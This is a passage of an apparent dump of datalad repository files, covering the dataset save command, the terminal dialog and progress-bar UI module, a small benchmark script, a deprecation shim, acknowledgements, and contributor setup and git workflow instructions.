nargs='*',\n constraints=EnsureStr() | EnsureNone()),\n message=save_message_opt,\n message_file=Parameter(\n args=(\"-F\", \"--message-file\"),\n doc=\"\"\"take the commit message from this file. This flag is\n mutually exclusive with -m.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n version_tag=Parameter(\n args=(\"-t\", \"--version-tag\",),\n metavar='ID',\n doc=\"\"\"an additional marker for that state. 
Every dataset that\n is touched will receive the tag.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n updated=Parameter(\n args=('-u', '--updated',),\n action='store_true',\n doc=\"\"\"if given, only saves previously tracked paths.\"\"\"),\n to_git=Parameter(\n args=(\"--to-git\",),\n action='store_true',\n doc=\"\"\"flag whether to add data directly to Git, instead of\n tracking data identity only. Use with caution, there is no\n guarantee that a file put directly into Git like this will\n not be annexed in a subsequent save operation.\n If not specified, it will be up to git-annex to decide how\n a file is tracked, based on a dataset's configuration\n to track particular paths,\n file types, or file sizes with either Git or git-annex.\n (see https://git-annex.branchable.com/tips/largefiles).\n \"\"\"),\n jobs=jobs_opt,\n amend=Parameter(\n args=('--amend',),\n action='store_true',\n doc=\"\"\"if set, changes are not recorded in a new, separate\n commit, but are integrated with the changeset of the previous\n commit, and both together are recorded by replacing that\n previous commit. This is mutually exclusive with recursive\n operation.\n \"\"\"),\n )\n\n @staticmethod\n @datasetmethod(name='save')\n @eval_results\n def __call__(path=None,\n *,\n message=None, dataset=None,\n version_tag=None,\n recursive=False, recursion_limit=None,\n updated=False,\n message_file=None,\n to_git=None,\n jobs=None,\n amend=False,\n ):\n if message and message_file:\n raise ValueError(\n \"Both a message and message file were specified for save()\")\n\n if amend and recursive:\n raise ValueError(\"Cannot amend a commit recursively.\")\n\n path = ensure_list(path)\n\n if message_file:\n with open(message_file) as mfh:\n message = mfh.read()\n\n # we want 'normal' to achieve the most compact argument list\n # for git calls\n # untracked_mode = 'no' if updated else 'normal'\n # TODO however, Repo.add() would refuse to add any dotfiles\n # in a directory that is itself untracked, hence the only\n # choice is to go with potentially crazy long lists\n # until https://github.com/datalad/datalad/issues/1454\n # has a resolution\n untracked_mode = 'no' if updated else 'all'\n\n # there are three basic scenarios:\n # 1. save modifications to any already tracked content\n # 2. save any content (including removal of deleted content)\n # to bring things to a clean state\n # 3. 
like (2), but only operate on a given subset of content\n # identified by paths\n # - all three have to work in conjunction with --recursive\n # - the difference between (1) and (2) should be no more\n # that a switch from --untracked=no to --untracked=all\n # in Repo.save()\n\n # we do not support\n # - simultaneous operations on multiple datasets from disjoint\n # dataset hierarchies, hence a single reference dataset must be\n # identifiable from the either\n # - curdir or\n # - the `dataset` argument.\n # This avoids complex annotation loops and hierarchy tracking.\n # - any modification upwards from the root dataset\n\n ds = require_dataset(dataset, check_installed=True, purpose='save')\n\n # use status() to do all discovery and annotation of paths\n paths_by_ds = {}\n for s in Status()(\n # ATTN: it is vital to pass the `dataset` argument as it,\n # and not a dataset instance in order to maintain the path\n # semantics between here and the status() call\n dataset=dataset,\n path=path,\n untracked=untracked_mode,\n recursive=recursive,\n recursion_limit=recursion_limit,\n on_failure='ignore',\n # for save without recursion only commit matters\n eval_subdataset_state='full' if recursive else 'commit',\n return_type='generator',\n # this could be, but for now only 'error' results are handled\n # below\n #on_failure='ignore',\n result_renderer='disabled'):\n if s['status'] == 'error':\n # Downstream code can't do anything with these. Let the caller\n # decide their fate.\n yield s\n continue\n\n # fish out status dict for this parent dataset\n ds_status = paths_by_ds.get(s['parentds'], {})\n # reassemble path status info as repo.status() would have made it\n ds_status[ut.Path(s['path'])] = \\\n {k: v for k, v in s.items()\n if k not in (\n 'path', 'parentds', 'refds', 'status', 'action',\n 'logger')}\n paths_by_ds[s['parentds']] = ds_status\n\n lgr.debug('Determined %i datasets for saving from input arguments',\n len(paths_by_ds))\n # figure out what datasets to process, start with the ones containing\n # the paths that were given as arguments\n discovered_datasets = list(paths_by_ds.keys())\n if dataset:\n # if a reference dataset was given we want to save all the way up\n # to it, so let's throw it into the mix\n discovered_datasets.append(ds.path)\n # sort the datasets into (potentially) disjoint hierarchies,\n # or a single one, if a reference dataset was given\n dataset_hierarchies = get_tree_roots(discovered_datasets)\n for rootds, children in dataset_hierarchies.items():\n edges = {}\n discover_dataset_trace_to_targets(\n rootds, children, [], edges, includeds=children)\n for superds, subdss in edges.items():\n superds_status = paths_by_ds.get(superds, {})\n for subds in subdss:\n subds_path = ut.Path(subds)\n sub_status = superds_status.get(subds_path, {})\n if not (sub_status.get(\"state\") == \"clean\" and\n sub_status.get(\"type\") == \"dataset\"):\n # start from an entry that may already exist in the\n # status record\n superds_status[subds_path] = superds_status.get(\n subds_path,\n # if we got nothing yet:\n # shot from the hip, some status config\n # to trigger this specific super/sub\n # relation to be saved\n dict(state='untracked', type='dataset')\n )\n paths_by_ds[superds] = superds_status\n\n def save_ds(args, version_tag=None):\n pdspath, paths = args\n\n pds = Dataset(pdspath)\n pds_repo = pds.repo\n # pop status for this dataset, we are not coming back to it\n pds_status = {\n # for handing over to the low-level code, we recode any\n # path relative to the real repo 
location, this avoid\n # cumbersome symlink handling without context in the\n # lower levels\n pds_repo.pathobj / p.relative_to(pdspath): props\n for p, props in paths.items()}\n start_commit = pds_repo.get_hexsha()\n if not all(p['state'] == 'clean' for p in pds_status.values()) or \\\n (amend and message):\n for res in pds_repo.save_(\n message=message,\n # make sure to have the `path` arg be None, as we want\n # to prevent and bypass any additional repo.status()\n # calls\n paths=None,\n # prevent whining of GitRepo\n git=True if not hasattr(pds_repo, 'uuid')\n else to_git,\n # we are supplying the full status already, do not\n # detect anything else\n untracked='no',\n _status=pds_status,\n amend=amend):\n # TODO remove stringification when datalad-core can handle\n # path objects, or when PY3.6 is the lowest supported\n # version\n for k in ('path', 'refds'):\n if k in res:\n res[k] = str(\n # recode path back to dataset path anchor\n pds.pathobj / Path(res[k]).relative_to(\n pds_repo.pathobj)\n )\n yield res\n # report on the dataset itself\n dsres = dict(\n action='save',\n type='dataset',\n path=pds.path,\n refds=ds.path,\n status='ok'\n if start_commit != pds_repo.get_hexsha()\n else 'notneeded',\n logger=lgr,\n )\n if not version_tag:\n yield dsres\n return\n try:\n # method requires str\n version_tag = str(version_tag)\n pds_repo.tag(version_tag)\n dsres.update(\n status='ok',\n version_tag=version_tag)\n yield dsres\n except CommandError as e:\n if dsres['status'] == 'ok':\n # first we yield the result for the actual save\n # TODO: we will get duplicate dataset/save record obscuring\n # progress reporting. yoh thought to decouple \"tag\" from \"save\"\n # messages but was worrying that original authors would disagree\n yield dsres.copy()\n # and now complain that tagging didn't work\n dsres.update(\n status='error',\n message=('cannot tag this version: %s', e.stderr.strip()))\n yield dsres\n\n if not paths_by_ds:\n # Special case: empty repo. There's either an empty commit only or\n # none at all. An empty one we can amend otherwise there's nothing\n # to do.\n if amend and ds.repo.get_hexsha():\n yield from save_ds((ds.pathobj, dict()), version_tag=version_tag)\n\n else:\n yield dict(action='save',\n type='dataset',\n path=ds.path,\n refds=ds.path,\n status='notneeded',\n logger=lgr)\n return\n\n # TODO: in principle logging could be improved to go not by a dataset\n # but by path(s) within subdatasets. 
That should provide a bit better ETA\n # and more \"dynamic\" feedback than jumpy datasets count.\n # See addurls where it is implemented that way by providing agg and another\n # log_filter\n yield from ProducerConsumerProgressLog(\n sorted(paths_by_ds.items(), key=lambda v: v[0], reverse=True),\n partial(save_ds, version_tag=version_tag),\n safe_to_consume=no_subds_in_futures,\n producer_future_key=lambda ds_items: ds_items[0],\n jobs=jobs,\n log_filter=_log_filter_save_dataset,\n unit=\"datasets\",\n lgr=lgr,\n )\n\n\ndef _log_filter_save_dataset(res):\n return res.get('type') == 'dataset' and res.get('action') == 'save'\n" }, { "alpha_fraction": 0.5827828645706177, "alphanum_fraction": 0.5868314504623413, "avg_line_length": 33.67734146118164, "blob_id": "270f473df06bfbddd945dd21b413e1f40bd7c1c2", "content_id": "ceef68c4472ec3aeaf383cb0b3d2fcd5c61edc15", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14079, "license_type": "permissive", "max_line_length": 97, "num_lines": 406, "path": "/datalad/ui/dialog.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Basic dialog-like interface for interactions in the terminal window\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom logging import getLogger\nlgr = getLogger('datalad.ui.dialog')\n\nlgr.log(5, \"Starting importing ui.dialog\")\n\nimport os\nimport sys\nimport time\n\nimport getpass\n\n#!!! OPT adds >100ms to import time!!!\n# from unittest.mock import patch\nfrom collections import deque\nfrom copy import copy\n\nfrom ..utils import auto_repr\nfrom ..utils import on_windows\nfrom .base import InteractiveUI\nfrom datalad.support.exceptions import CapturedException\n\n# Example APIs which might be useful to look for \"inspiration\"\n# man debconf-devel\n# man zenity\n#\n# \"Fancy\" output of progress etc in the terminal:\n# - docker has multiple simultaneous progressbars. Apparently \"navigation\"\n# is obtained with escape characters in the terminal.\n# see docker/pkg/jsonmessage/jsonmessage.go or following snippet\n#\n#from time import sleep\n#import sys\n#\n#out = sys.stderr\n#for i in range(10):\n# diff = 2\n# if i:\n# out.write(\"%c[%dA\" % (27, diff))\n# out.write(\"%d\\n%d\\n\" % (i, i ** 2))\n# sleep(0.5)\n#\n# They also use JSON representation for the message which might provide a nice abstraction\n# Other useful codes\n# // <ESC>[2K = erase entire current line\n# fmt.Fprintf(out, \"%c[2K\\r\", 27)\n# and code in docker: pkg/progressreader/progressreader.go pkg/streamformatter/streamformatter.go\n#\n# reference for ESC codes: http://ascii-table.com/ansi-escape-sequences.php\n\n\n@auto_repr\nclass ConsoleLog(object):\n\n progressbars = None\n\n def __init__(self, out=sys.stdout):\n self.out = out\n\n def message(self, msg, cr='\\n'):\n from datalad.log import no_progress\n with no_progress():\n try:\n self.out.write(msg)\n except UnicodeEncodeError as e:\n # all unicode magic has failed and the receiving end cannot handle\n # a particular unicode char. 
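                # Editor's illustrative aside (not from the upstream source):
                # the fallback below leans on the codec "replace" error handler,
                # e.g. "naïve".encode("ascii", "replace").decode("ascii")
                # yields "na?ve" -- the message is degraded, but still shown.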
rather than crashing, we replace the\n # offending chars to be able to message at least something, and we\n # log that we did that\n encoding = self.out.encoding\n lgr.debug(\n \"Replacing unicode chars in message output for display: %s\",\n e)\n self.out.write(\n msg.encode(encoding, \"replace\").decode(encoding))\n if cr:\n self.out.write(cr)\n\n def error(self, error):\n self.message(\"ERROR: %s\" % error)\n\n def get_progressbar(self, *args, **kwargs):\n \"\"\"Return a progressbar. See e.g. `tqdmProgressBar` about the interface\n\n Additional parameter is backend to choose among available\n \"\"\"\n backend = kwargs.pop('backend', None)\n # Delay imports of progressbars until actually needed\n if ConsoleLog.progressbars is None:\n from .progressbars import progressbars\n ConsoleLog.progressbars = progressbars\n else:\n progressbars = ConsoleLog.progressbars\n\n if backend is None:\n # Resort to the configuration\n from .. import cfg\n backend = cfg.get('datalad.ui.progressbar', None)\n\n if backend is None:\n try:\n pbar = progressbars['tqdm']\n except KeyError:\n pbar = progressbars.values()[0] # any\n else:\n pbar = progressbars[backend]\n return pbar(*args, out=self.out, **kwargs)\n\n @property\n def is_interactive(self):\n return isinstance(self, InteractiveUI)\n\n\n@auto_repr\nclass SilentConsoleLog(ConsoleLog):\n \"\"\"A ConsoleLog with a SilentProgressbar\"\"\"\n\n def get_progressbar(self, *args, **kwargs):\n from .progressbars import SilentProgressBar\n return SilentProgressBar(*args, **kwargs)\n\n def question(self, text, title=None, **kwargs):\n msg = \"A non-interactive silent UI was asked for a response to a question: %s.\" % text\n if title is not None:\n msg += ' Title: %s.' % title\n if not kwargs.get('hidden'):\n kwargs_str = ', '.join(\n ('%s=%r' % (k, v)\n for k, v in kwargs.items()\n if v is not None))\n if kwargs_str:\n msg += \" Additional arguments: %s\" % kwargs_str\n else:\n msg += \" Additional arguments are not shown because 'hidden' is set.\"\n raise RuntimeError(msg)\n\n\n@auto_repr\nclass QuietConsoleLog(ConsoleLog):\n \"\"\"A ConsoleLog with a LogProgressbar\"\"\"\n\n def get_progressbar(self, *args, **kwargs):\n from .progressbars import LogProgressBar\n return LogProgressBar(*args, **kwargs)\n\n\ndef getpass_echo(prompt='Password', stream=None):\n \"\"\"Q&D workaround until we have proper 'centralized' UI -- just use getpass BUT enable echo\n \"\"\"\n if on_windows:\n # Can't do anything fancy yet, so just ask the one without echo\n return getpass.getpass(prompt=prompt, stream=stream)\n else:\n # We can mock patch termios so that ECHO is not turned OFF.\n # Side-effect -- additional empty line is printed\n\n # def _no_emptyline_write(out):\n # # Additional mock to prevent not needed empty line print since we do have echo\n # # doesn't work since we don't know the stream here really\n # if out == '\\n':\n # return\n # stream.write(out)\n from unittest.mock import patch\n with patch('termios.ECHO', 255 ** 2):\n #patch.object(stream, 'write', _no_emptyline_write(stream)):\n return getpass.getpass(prompt=prompt, stream=stream)\n\n\ndef _get_value(value, hidden):\n return \"<hidden>\" if hidden else value\n\n\n@auto_repr\nclass DialogUI(ConsoleLog, InteractiveUI):\n\n def __init__(self, *args, **kwargs):\n super(DialogUI, self).__init__(*args, **kwargs)\n # ATM doesn't make sense to print the same title for subsequent questions\n # so we will store previous one and not show it if was the previous one shown\n # within 5 seconds from prev question\n 
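        # Editor's illustrative sketch (not part of the upstream module) of a
        # typical exchange built on this class:
        #
        #   ui = DialogUI()
        #   ui.question("Really delete?", choices=["yes", "no"], default="no")
        #   ui.question("API token", hidden=True)  # asks twice unless repeat=False
        #
        # The title bookkeeping below merely suppresses repeated banners when
        # several questions arrive back to back within a few seconds.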
self._prev_title = None\n self._prev_title_time = 0\n\n def input(self, prompt, hidden=False):\n \"\"\"Request user input\n\n Parameters\n ----------\n prompt: str\n Prompt for the entry\n \"\"\"\n # if not hidden:\n # self.out.write(msg + \": \")\n # self.out.flush() # not effective for stderr for some reason under annex\n #\n # # TODO: raw_input works only if stdin was not controlled by\n # # (e.g. if coming from annex). So we might need to do the\n # # same trick as get_pass() does while directly dealing with /dev/pty\n # # and provide per-OS handling with stdin being override\n # response = (raw_input if PY2 else input)()\n # else:\n return (getpass.getpass if hidden else getpass_echo)(prompt)\n\n def question(self, text,\n title=None, choices=None,\n default=None,\n hidden=False,\n repeat=None):\n # Do initial checks first\n if default and choices and default not in choices:\n raise ValueError(\"default value %r is not among choices: %s\"\n % (_get_value(default, hidden), choices))\n\n msg = ''\n if title and not (title == self._prev_title and time.time() - self._prev_title_time < 5):\n # might not actually get displayed if all in/out redirected\n # self.out.write(title + \"\\n\")\n # so merge into msg for getpass\n msg += title + os.linesep\n\n def mark_default(x):\n return \"[%s]\" % x \\\n if default is not None and x == default \\\n else x\n\n if choices is not None:\n msg += \"%s (choices: %s)\" % (text, ', '.join(map(mark_default, choices)))\n elif default is not None:\n msg += '{} [{}]'.format(text, default)\n else:\n msg += text\n # Like this:\n #Anaconda format:\n #\n #Question? [choice1|choice2]\n #[default] >>> yes\n attempt = 0\n while True:\n attempt += 1\n if attempt >= 100:\n raise RuntimeError(\"This is 100th attempt. Something really went wrong\")\n\n response = self.input(\"{}: \".format(msg), hidden=hidden)\n # TODO: dedicated option? got annoyed by this one\n # multiple times already, typically we are not defining\n # new credentials where repetition would be needed.\n if hidden and repeat is None:\n repeat = hidden and choices is None\n\n if repeat:\n response_r = self.input('{} (repeat): '.format(msg), hidden=hidden)\n if response != response_r:\n self.error(\"input mismatch, please start over\")\n continue\n\n if response and '\\x03' in response:\n # Ctrl-C is part of the response -> clearly we should not pretend it's all good\n raise KeyboardInterrupt\n\n if not response and default:\n response = default\n break\n\n if choices and response not in choices:\n self.error(\"%r is not among choices: %s. Repeat your answer\"\n % (_get_value(response, hidden), choices))\n continue\n break\n\n self._prev_title = title\n self._prev_title_time = time.time()\n\n return response\n\n\nclass IPythonUI(DialogUI):\n \"\"\"Custom to IPython frontend UI implementation\n\n There is no way to discriminate between web notebook or qt console,\n so we have just a single class for all.\n\n TODO: investigate how to provide 'proper' displays for\n IPython of progress bars so backend could choose the\n appropriate one\n\n \"\"\"\n\n _tqdm_frontend = \"unknown\"\n\n def input(self, prompt, hidden=False):\n # We cannot and probably do not need to \"abuse\" termios\n if not hidden:\n self.out.write(prompt)\n self.out.flush()\n return input()\n else:\n return getpass.getpass(prompt=prompt)\n\n def get_progressbar(self, *args, **kwargs):\n \"\"\"Return a progressbar. See e.g. 
`tqdmProgressBar` about the\n interface\n\n Additional parameter is backend to choose among available\n \"\"\"\n backend = kwargs.pop('backend', None)\n if self._tqdm_frontend == \"unknown\":\n try:\n from tqdm import tqdm_notebook # check if available etc\n self.__class__._tqdm_frontend = 'ipython'\n except Exception as exc:\n lgr.warning(\n \"Regular progressbar will be used -- cannot import tqdm_notebook: %s\",\n CapturedException(exc)\n )\n self.__class__._tqdm_frontend = None\n if self._tqdm_frontend:\n kwargs.update()\n return super(IPythonUI, self).get_progressbar(\n *args, frontend=self._tqdm_frontend, **kwargs)\n\n\n# poor man thingie for now\n@auto_repr\nclass UnderAnnexUI(DialogUI):\n def __init__(self, specialremote=None, **kwargs):\n if 'out' not in kwargs:\n # to avoid buffering\n # http://stackoverflow.com/a/181654/1265472\n #kwargs['out'] = os.fdopen(sys.stderr.fileno(), 'w', 0)\n # but wasn't effective! sp kist straogjt for now\n kwargs['out'] = sys.stderr\n super(UnderAnnexUI, self).__init__(**kwargs)\n self.specialremote = specialremote\n\n def set_specialremote(self, specialremote):\n lgr.debug(\"Setting specialremote of UI %s to %s\", self, specialremote)\n self.specialremote = specialremote\n\n def get_progressbar(self, *args, **kwargs):\n if self.specialremote:\n kwargs = kwargs.copy()\n kwargs['backend'] = 'annex-remote'\n kwargs['remote'] = self.specialremote\n return super(UnderAnnexUI, self).get_progressbar(\n *args, **kwargs)\n\n\n@auto_repr\nclass UnderTestsUI(DialogUI):\n \"\"\"UI to help with testing functionality requiring interaction\n\n It will provide additional method to push responses to be provided,\n and could be used as a context manager\n \"\"\"\n\n def __init__(self, **kwargs):\n super(UnderTestsUI, self).__init__(**kwargs)\n self._responses = deque()\n\n # TODO: possibly allow to provide expected messages etc, so we could\n # test that those are the actual ones which were given\n def add_responses(self, responses):\n if not isinstance(responses, (list, tuple)):\n responses = [responses]\n self._responses += list(responses)\n return self # so we could use it as a context manager\n\n def get_responses(self):\n return self._responses\n\n def clear_responses(self):\n self._responses = deque()\n\n def question(self, *args, **kwargs):\n if not self._responses:\n raise AssertionError(\n \"We are asked for a response whenever none is left to give\"\n )\n return self._responses.popleft()\n\n # Context manager mode of operation which would also verify that\n # no responses left upon exiting\n def __enter__(self):\n pass\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n responses = copy(self._responses)\n # we should clear the state so there is no side-effect\n self.clear_responses()\n assert not len(responses), \\\n \"Still have some responses left: %s\" % repr(self._responses)\n\nlgr.log(5, \"Done importing ui.dialog\")\n" }, { "alpha_fraction": 0.6322869658470154, "alphanum_fraction": 0.6457399129867554, "avg_line_length": 21.299999237060547, "blob_id": "c1194b4e2e2a2f9fee0a1ce3e41887a6782a22b9", "content_id": "d210a622e28ae14e0be49247fcd1ed475f3c7a8f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "permissive", "max_line_length": 77, "num_lines": 10, "path": "/benchmarks/scripts/heavyout", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom time import time\nimport sys\n\nniter = int(sys.argv[1])\nload = 
{i: \"x\" * i for i in range(10)}\n\nfor i in range(niter):\n print(\"I am looping already for {} iterations. Load: {}\".format(i, load))\n" }, { "alpha_fraction": 0.7298387289047241, "alphanum_fraction": 0.7298387289047241, "avg_line_length": 26.55555534362793, "blob_id": "51508b60bce9bef481ab5d4df99b38ba06b1abf8", "content_id": "4b5221cd58c1dfa6507ede60d4aff71e4b131d0f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 248, "license_type": "permissive", "max_line_length": 71, "num_lines": 9, "path": "/datalad/plugin/wtf.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.wtf is deprecated and will be removed in a future \"\n \"release. \"\n \"Use the module from its new location datalad.local.wtf instead.\",\n DeprecationWarning)\n\nfrom datalad.local.wtf import *\n" }, { "alpha_fraction": 0.7310469150543213, "alphanum_fraction": 0.7644404172897339, "avg_line_length": 49.3636360168457, "blob_id": "2271faabb0558e70ed4533e9f4ed43e014df6660", "content_id": "e7935595a4ed943cfafed97757d364629c0aa19f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1108, "license_type": "permissive", "max_line_length": 79, "num_lines": 22, "path": "/docs/source/acknowledgements.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Acknowledgments\n***************\n\nDataLad development is being performed as part of a US-German collaboration in\ncomputational neuroscience (CRCNS) project \"DataGit: converging catalogues,\nwarehouses, and deployment logistics into a federated 'data distribution'\"\n(Halchenko_/Hanke_), co-funded by the US National Science Foundation (`NSF\n1429999`_) and the German Federal Ministry of Education and Research (`BMBF\n01GQ1411`_). Additional support is provided by the German federal state of\nSaxony-Anhalt and the European Regional Development\nFund (ERDF), Project: `Center for Behavioral Brain Sciences`_, Imaging Platform\n\nDataLad is built atop the git-annex_ software that is being developed and\nmaintained by `Joey Hess`_.\n\n.. _Halchenko: http://haxbylab.dartmouth.edu/ppl/yarik.html\n.. _Hanke: http://www.psychoinformatics.de\n.. _NSF 1429999: http://www.nsf.gov/awardsearch/showAward?AWD_ID=1429999\n.. _BMBF 01GQ1411: http://www.gesundheitsforschung-bmbf.de/de/2550.php\n.. _Center for Behavioral Brain Sciences: http://cbbs.eu/en/\n.. _git-annex: http://git-annex.branchable.com\n.. 
_Joey Hess: https://joeyh.name\n" }, { "alpha_fraction": 0.7400577068328857, "alphanum_fraction": 0.7478511929512024, "avg_line_length": 45.19259262084961, "blob_id": "aa0395ab1bcd13ff7ea470f70dbceab7a94cb9c3", "content_id": "9afe05348ef08e04661b21836d580616ed862534", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 31228, "license_type": "permissive", "max_line_length": 365, "num_lines": 675, "path": "/CONTRIBUTING.md", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# Contributing to DataLad\n\n[gh-datalad]: http://github.com/datalad/datalad\n\n## Files organization\n\n- [datalad/](./datalad) is the main Python module where major development is happening,\n with major submodules being:\n - `cmdline/` - helpers for accessing `interface/` functionality from\n command line\n - `customremotes/` - custom special remotes for annex provided by datalad\n - `downloaders/` - support for accessing data from various sources (e.g.\n http, S3, XNAT) via a unified interface.\n - `configs/` - specifications for known data providers and associated\n credentials\n - `interface/` - high level interface functions which get exposed via\n command line (`cmdline/`) or Python (`datalad.api`).\n - `tests/` - some unit- and regression- tests (more could be found under\n `tests/` of corresponding submodules. See [Tests](#tests))\n - [utils.py](./datalad/tests/utils.py) provides convenience helpers used by unit-tests such as\n `@with_tree`, `@serve_path_via_http` and other decorators\n - `ui/` - user-level interactions, such as messages about errors, warnings,\n progress reports, AND when supported by available frontend --\n interactive dialogs\n - `support/` - various support modules, e.g. for git/git-annex interfaces,\n constraints for the `interface/`, etc\n- [benchmarks/](./benchmarks) - [asv] benchmarks suite (see [Benchmarking](#benchmarking))\n- [docs/](./docs) - yet to be heavily populated documentation\n - `bash-completions` - bash and zsh completion setup for datalad (just\n `source` it)\n- [fixtures/](./fixtures) currently not under git, contains generated by vcr fixtures\n- [sandbox/](./sandbox) - various scripts and prototypes which are not part of\n the main/distributed with releases codebase\n- [tools/](./tools) contains helper utilities used during development, testing, and\n benchmarking of DataLad. Implemented in any most appropriate language\n (Python, bash, etc.)\n\nWhenever a new top-level file or folder is added to the repository, it should\nbe listed in `MANIFEST.in` so that it will be either included in or excluded\nfrom source distributions as appropriate. [See\nhere](https://packaging.python.org/guides/using-manifest-in/) for information\nabout writing a `MANIFEST.in`.\n\n## How to contribute\n\nThe preferred way to contribute to the DataLad code base is\nto fork the [main repository][gh-datalad] on GitHub. Here\nwe outline the workflow used by the developers:\n\n\n0. Have a clone of our main [project repository][gh-datalad] as `origin`\n remote in your git:\n\n git clone git://github.com/datalad/datalad\n\n1. Fork the [project repository][gh-datalad]: click on the 'Fork'\n button near the top of the page. This creates a copy of the code\n base under your account on the GitHub server.\n\n2. 
Add your forked clone as a remote to the local clone you already have on your\n local disk:\n\n git remote add gh-YourLogin [email protected]:YourLogin/datalad.git\n git fetch gh-YourLogin\n\n To ease addition of other github repositories as remotes, here is\n a little bash function/script to add to your `~/.bashrc`:\n\n ghremote () {\n url=\"$1\"\n proj=${url##*/}\n url_=${url%/*}\n login=${url_##*/}\n git remote add gh-$login $url\n git fetch gh-$login\n }\n\n thus you could simply run:\n\n ghremote [email protected]:YourLogin/datalad.git\n\n to add the above `gh-YourLogin` remote. Additional handy aliases\n such as `ghpr` (to fetch existing pr from someone's remote) and \n `ghsendpr` could be found at [yarikoptic's bash config file](http://git.onerussian.com/?p=etc/bash.git;a=blob;f=.bash/bashrc/30_aliases_sh;hb=HEAD#l865)\n\n3. Create a branch (generally off the `origin/master`) to hold your changes:\n\n git checkout -b nf-my-feature\n\n and start making changes. Ideally, use a prefix signaling the purpose of the\n branch\n - `nf-` for new features\n - `bf-` for bug fixes\n - `rf-` for refactoring\n - `doc-` for documentation contributions (including in the code docstrings).\n - `bm-` for changes to benchmarks\n We recommend to not work in the ``master`` branch!\n\n4. Work on this copy on your computer using Git to do the version control. When\n you're done editing, do:\n\n git add modified_files\n git commit\n\n to record your changes in Git. Ideally, prefix your commit messages with the\n `NF`, `BF`, `RF`, `DOC`, `BM` similar to the branch name prefixes, but you could\n also use `TST` for commits concerned solely with tests, and `BK` to signal\n that the commit causes a breakage (e.g. of tests) at that point. Multiple\n entries could be listed joined with a `+` (e.g. `rf+doc-`). See `git log` for\n examples. If a commit closes an existing DataLad issue, then add to the end\n of the message `(Closes #ISSUE_NUMER)`\n\n5. Push to GitHub with:\n\n git push -u gh-YourLogin nf-my-feature\n\n Finally, go to the web page of your fork of the DataLad repo, and click\n 'Pull request' (PR) to send your changes to the maintainers for review. This\n will send an email to the committers. 
You can commit new changes to this branch\n and keep pushing to your remote -- github automagically adds them to your\n previously opened PR.\n\n(If any of the above seems like magic to you, then look up the\n[Git documentation](http://git-scm.com/documentation) on the web.)\nOur [Design Docs](http://docs.datalad.org/en/stable/design/index.html) provide a\ngrowing collection of insights on the command API principles and the design of\nparticular subsystems in DataLad to inform standard development practice.\n\n## Development environment\n\nWe support Python 3 only (>= 3.7).\n\nSee [README.md:Dependencies](README.md#Dependencies) for basic information\nabout installation of datalad itself.\nOn Debian-based systems we recommend to enable [NeuroDebian](http://neuro.debian.net)\nsince we use it to provide backports of recent fixed external modules we depend upon:\n\n```sh\napt-get install -y -q git git-annex-standalone\napt-get install -y -q patool python3-scrapy python3-{argcomplete,git,humanize,keyring,lxml,msgpack,progressbar,requests,setuptools}\n```\n\nand additionally, for development we suggest to use tox and new\nversions of dependencies from pypy:\n\n```sh\napt-get install -y -q python3-{dev,httpretty,pytest,pip,vcr,virtualenv} python3-tox\n# Some libraries which might be needed for installing via pip\napt-get install -y -q lib{ffi,ssl,curl4-openssl,xml2,xslt1}-dev\n```\n\nsome of which you could also install from PyPi using pip (prior installation of those libraries listed above\nmight be necessary)\n\n```sh\npip install -r requirements-devel.txt\n```\n\nand you will need to install recent git-annex using appropriate for your\nOS means (for Debian/Ubuntu, once again, just use NeuroDebian).\n\nContributor Files History\n-------------------------\n\nThe original repository provided a [.zenodo.json](.zenodo.json)\nfile, and we generate a [.contributors file](.all-contributorsrc) from that via:\n\n```bash\npip install tributors\ntributors --version\n0.0.18\n```\n\nIt helps to have a GitHub token to increase API limits:\n\n```bash\nexport GITHUB_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n```\n\nInstructions for these environment variables can be found [here](https://con.github.io/tributors/docs/getting-started#2-environment). \nThen update zenodo:\n\n```bash\ntributors update zenodo\nINFO: zenodo:Updating .zenodo.json\nINFO: zenodo:Updating .tributors cache from .zenodo.json\nWARNING:tributors:zenodo does not support updating from names.\n```\n\nIn the case that there is more than one orcid found for a user, you will be given a list\nto check. Others will be updated in the file. 
